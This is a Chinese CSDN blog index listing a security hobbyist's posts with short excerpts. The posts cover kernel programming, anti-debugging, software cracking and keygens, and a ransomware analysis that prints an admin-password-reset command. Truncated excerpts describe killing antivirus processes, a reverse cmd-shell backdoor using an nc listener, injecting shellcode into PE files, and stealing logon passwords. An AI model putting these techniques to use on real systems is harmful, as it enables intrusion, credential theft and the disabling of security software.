小驹-优快云博客

原创像我这么傻B的人，迟早会还的

像我这么傻B的人，迟早会还的腾讯，这样真的合适么？

2015-01-16 14:54:08 1344

原创敲诈者来了~~

敲诈者来了~~今天整理东西，发现一大波的敲诈者病毒来了。。一典型行为起个欺骗性名字的。比如：MD5:7a3e070f232fda5e71bc3506005d35ae名字叫：强制登陆体验服飞车.exe ，可以看出是假装是游戏软件的。程序有个很牛的图标：意发科技，形如：运行后程序调用net.exe user administrator huanghaisheng命令，给administrator 加

2014-12-19 19:10:27 3467

原创进程保护--CrossThreadFlags标志位

进程保护 wrk ethread crossthreadflags

2014-11-24 15:49:39 3898

原创在PsIsSystemThread中得到线程的是否为系统线程的标志

PsIsSystemThread 蓝屏进程保护线程内核安全

2014-11-19 11:39:29 2877

翻译 CVE-2014-4113：飓风熊猫（HURRICANE PANDA）Win64bit提权0day漏洞

飓风熊猫被认为是原产于中国、主要针对基础设施公司的先进攻击者。我们知道它们除了拥有0day漏洞外，还有其他的三种本地特权提升漏洞。我们知道飓风熊猫使用的是“ChinaChopper”Webshell，而一旦上传这一Webshell，操作者就可试图提升权限，然后通过各种密码破解工具获得目标访问的合法凭证。本地实验结果使用0sayTest.exe cmd命令后，打开的权限从原来的xiaoju变成了sy

2014-11-09 10:26:37 4365

转载 360SelfProtection.sys无法使用Driver Monitor加载

原文：http://bbs.pediy.com/showthread.php?t=128515问题：虚拟机里使用Driver Monitor加载360SelfProtection.sys，外面使用windbg下了延迟断点。断点下在了DriverEntry第一句。结果。。。使用Driver Monitor加载时没有命中断点。。。之后Driver Monitor还提示连到系统上的设备没有发挥作用。。。

2014-11-06 16:09:29 3571

原创 object hook实现禁止创建文件

内核 object hook 文件

2014-11-05 17:08:53 5149

翻译内存填零杀进程

内存填零杀进程效果:可以杀掉360的傀儡进程zhudongfangyun.exe但杀360tray.exe时会卡死系统,不知道360tray做了如何保护...c代码:PHYSICAL_ADDRESS g_physicalPage;VOID DestoryProess(ULONG eproc){ ULONG ulEndAddress = (ULONG)MmSystemRangeStart; PHYS

2014-11-04 15:54:35 4509

转载 (转) SYSTEM_HANDLE_INFORMATION中ObjectTypeIndex的定义

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO{ USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG Gran

2014-11-03 10:16:35 4998

原创内核中的_OBJECT_INFORMATION_CLASS 结构

实际上这个枚举类型有5种typedef enum _OBJECT_INFORMATION_CLASS { ObjectBasicInformation, ObjectNameInformation, ObjectTypeInformation, ObjectAllInformation, ObjectDataInformation} OBJECT_INFORMATIO

2014-11-03 10:13:58 5539 1

原创模拟锁定文件

模拟锁定文件的Rring 3下的程序代码,代码来自于看雪中的HWL发表的一份代码中,我只是看了下代码:#include #include void GetAllProcessA(int pids[],int *procount){ int i=0,c=0; HANDLE hProcess=0; for(i=8;i19996;i+=4) { hProcess=OpenProcess(0x10,0,

2014-11-03 10:10:29 2618

转载基础调试命令 - u/ub/uf

原文：http://www.cnblogs.com/developersupport/p/windbgcommand-u.html

2014-10-14 11:09:51 4119

原创 windows内核编程--头文件包含的奇葩的问题

windows 内核编程头文件

2014-09-29 18:45:18 4533

原创加密壳之ACProtect之OEP的处理

加密解密 ACProtect OEP

2014-07-10 15:29:04 6277

原创精装友情通讯录算法逆向与注册机实现

精装友情通讯录算法逆向注册机 c语言破解逆向

2014-06-19 16:31:46 6094

原创庖丁解牛破解与注册机编写

庖丁解牛破解程序注册机逆向

2014-06-18 11:37:53 7410

原创 ColorSchemer Studio 2 破解

破解逆向算法密码

2014-06-13 15:20:18 5599 1

原创 360破解大赛crackme分析--之3DES解密附加数据

360 破解大赛 crackme 分析 3DES

2014-05-29 11:58:42 7861

原创解析PE文件的附加数据

解析程序自己的附加数据，将附加数据写入文件中。主要是解析PE文件头，定位到overlay的地方，写入文件。常应用的场景是在crackme中，crackme自身有一段加密过的附加数据，在crackme运行的过程中解析自己的附加数据，然后解密这段数据。。。。代码留存：//解析自己的PE文件 TCHAR szModuleFile[MAX_PATH] = {0}; ::GetMod

2014-05-27 11:23:47 7662

原创ＳＥＨ反调试的实现与调试

ＳＥＨ用于反调试或者用于注册码的隐藏时。在没有异常时永远都是错误的注册码，只有当触发异常时，程序才走到注册成功的地方……代码如下：void CSehDlg::RegSuc(){ HWND hWnd = ::GetDlgItem(NULL, IDC_STC_TIP); ::SetWindowText(hWnd, "Success!!");}void CSehDlg::RegFai

2014-05-16 17:38:58 10386

原创警察与小偷的实现之一客户端与服务端通信

来源于ISCC 2012 破解关第四题目的是通过逆向police，实现一个thief,能够与police进行通信实际上就是一个ＲＳＡ加密通信的例子，我们通过自己编写客户端和服务端来实现上面的thief和police的功能．．要通信，这们这次先通过python写出可以进行网络连接的客户端与服务端．．服务端代码#!/usr/bin/env python impo

2014-04-28 15:18:57 7293

原创 HOOK 低层键盘消息---WH_KEYBOARD_LL

代码:屏蔽三个全局快捷键代码的作用是屏蔽掉注释中的三个快捷键.LRESULT CALLBACK LowLevelKeyboardProc (INT nCode, WPARAM wParam, LPARAM lParam){ // By returning a non-zero value from the hook procedure, the // message does

2014-04-06 14:28:51 19137

原创 python中二维阵列的变换

python 阵列变换

2013-09-24 13:43:30 10568

原创 python每次处理一个字符的三种方法

python 字符字符串

2013-09-18 15:36:51 8046

原创得到操作系统版本号

IInitWindowsVersion.c//**************************************************************************//*//* //* //*文件说明：//* 获取系统内核版本//**************************************

2013-01-15 11:08:29 15815

转载 FindDllByVad遍历dll文件

vadRoot结构好像中有在sp2系统下有效，在sp3系统下调试时，会在遍历avl树的操作时蓝屏...驱动层：.h/* FindDllByVad.H Author: Last Updated: 2007-07-06 This framework is generated by EasySYS 0.3.0 This template file is c

2013-01-09 14:06:13 13702

原创基于文件与内容比较检测SSDT变化

在DriverEntry中FindOriAddress(3)得到文件基址中的SSDT索引号为3的函数地址调试结果如下：通过脚本查看到的SSDT的信息如下图：脚本来源于：http://bbs.pediy.com/showthread.php?t=34018$$ ntcall Script v0.1$$ by 小喂 2006.10.29$$ $$><d:

2012-12-18 11:36:51 13104

原创窗口攻击大法

窗口攻击大法：现在攻击Xurte, powertool,360等都还有用。。界面：1.窗口失效void CWindowAttackDlg::On_Ok() { // TODO: Add your control notification handler code here // TODO: Add extra validation here DWORD dw

2012-12-06 19:38:15 12320

原创零管道返回cmdshell

零管道返回cmdshell192.168.139.128为虚拟机的IP地址。实验步骤：1 在虚拟机中开启nc -l -v -p 8888进行监听2. 运行编译好的程序虚拟机就会得到实体机的cmd了....// ZeroPipeBackdoor.cpp : Defines the entry point for the console applicat

2012-12-06 14:53:43 12239

原创将shellcode 插入到PE节表的间隔中

将shellcode 插入到PE节表的间隔中// InsertShellCodeToPE.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include #define FILENAME "hello.exe"//自定义的shellcodechar shellcod

2012-12-04 09:31:52 11404

原创增加节表存放shellcode

将shellcode放在PE文件新增的节表中// InsertShellCodeToPE.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include #define FILENAME "hello.exe"//自定义的shellcodechar shellcod

2012-12-01 17:16:51 12250

原创获得系统密码（对windows 7无效）

实现步骤：1. 生成GetInfo.dll2. 将生成的GetInfo.dll作为资源放到GetPwd工程中3. 生成GetInfo.exe4. 运行GetInfo.exe install5. 重启机器，输入密码，进入系统后会得到C:\WINDOWS\System32\getPwdout.txt文件，文件内容为：实现原理：将GetInfo.dll，放在W

2012-12-01 14:26:48 12345

原创防止对特定的函数下CC断点

防止对特定的函数下CC断点下面是对GetDlgItemText下断的检测方法DWORD WINAPI ThreadProc(LPVOID lpParam){typedef UINT (__stdcall * pGetDlgItemText)(HWND, INT, LPTSTR, INT); //函数指针申明PBYTE pByte = (PBY

2012-11-22 13:50:39 11286

原创 TLS中检测断点反调试

TLS原理：通过检测程序入口点处的200字节内是否有下的cc断点，如果有，刚程序退出// TLS_test.cpp : Defines the entry point for the application.//#include "stdafx.h"#include "TLS_test.h"#include #include #pragma comment(linker, "

2012-11-21 17:01:12 12165

原创 API内存搜索引擎（C语言内嵌汇编）

API内存搜索引擎（C语言内嵌汇编）// apisearchEngine.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include DWORD __stdcall GetStrLengthA(char* szName){ _asm { push edi

2012-11-17 11:17:02 11157

转载 1994年，电影的颠峰，永远无法被超越[转载]

有些时候非常珍贵的艺术精品会在一段时间内呈井喷似的大量出现，你很难解释其中的原因，但不能不承认有些时候一个普通的年份因此而具备了经典的重量。作为全世界影迷来说，我们不能不记得公元1994年。这一年到底发生了什么，如此超一流的影片，如此大规模的出现在世界各地呢？那一年也许上帝想看电影了。让我们来检阅一下，公元1994，地球上诞生了多少经典中的经典电影。美国：

2012-10-27 09:14:34 11218

原创 vc6.0使用vmprotect加壳

介绍两种方式：1. map方式2. sdk方式废话不多说，begin~~~1. map方式首先，要让vc6.0生成工程的map文件，设置方式如下:Alt+F7 ，打开“Project Settings”选项页，选择 C/C++ 选项卡，并在最下面的 Project Options 里面输入：/Zd ，然后要选择 Link 选项卡，在最下面的 Project Opti

2012-10-19 09:31:11 15939 1

翻译 GOOGLE的go语言在恶意程序中的使用

转自：http://www.symantec.com/connect/blogs/malware-uses-google-go-language我找到的样本：公司: GalaxyNexusRoot文件版本: 3.02.2011内部名称: GalaxyNxRoot源文件名: GalaxyNxRoot.exe产品名称: GalaxySNxRoot产品版本: 3.02

2012-09-24 11:29:39 10230

原创 python正则表达式的用法

import rer1 = re.compile(r'(?im)(?P)$')content = """ boxsuch as 'box' and 'boxes', but not 'inbox'. In other wordsboxdsafdsafdas """reobj = re.compile("(?im)(?P)$")for match in

2012-09-22 09:34:45 10746